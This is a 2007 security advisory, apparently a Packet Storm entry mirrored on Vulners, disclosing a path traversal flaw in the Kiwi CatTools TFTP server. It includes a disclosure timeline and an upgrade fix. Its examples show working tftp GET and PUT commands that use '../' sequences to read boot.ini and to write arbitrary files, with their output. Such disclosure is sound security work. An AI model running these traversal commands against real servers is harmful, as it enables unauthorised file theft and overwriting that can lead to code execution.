Lucene search

K

kiwicat-exec.txt

🗓️ 06 Mar 2007 00:00:00Reported by Sergey GordeychikType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Path traversal security vulnerability in Kiwi CatTools TFTP server can lead to information disclosure and remote code execution. Upgrade to CatTools 3.2.

Show more
Code
`Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8  
server can lead to information disclosure and remote code execution  
  
Risk: High  
  
DISCUSSION  
  
  
Kiwi CatTools TFTP server doesn't properly verify filename in PUT and GET  
request which can be used to download/upload any file from/to server.  
Default setting allows replacing of existing files. Such settings lead to  
probability to replace an executable files and run code on attacker choice.   
  
EXAMPLES  
  
C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt  
  
Transfer successful: 212 bytes in 1 second, 212 bytes/s  
  
C:\>type boot.txt  
  
[boot loader]  
timeout=30  
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS  
  
C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt  
  
Transfer successful: 212 bytes in 1 second, 212 bytes/s  
  
C:\>type pttest.txt  
  
[boot loader]  
timeout=30  
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS  
  
C:\>  
  
  
  
SOLUTION  
  
  
  
Upgrade to CatTools 3.2.9 which is available for download at  
<http://www.kiwisyslog.com/downloads.php>  
http://www.kiwisyslog.com/downloads.php  
  
  
  
  
  
CREDITS  
  
  
  
Sergey Gordeychik of Positive Technologies (www.ptsecurity.com)  
  
DISCLOSURE TIMELINE  
  
  
  
Vulnerability discovered: 11/20/2006  
  
Initial vendor contact: 12/08/2006  
  
Patch released: 02/13/2007  
  
Public disclosure: 02/27/2007  
  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo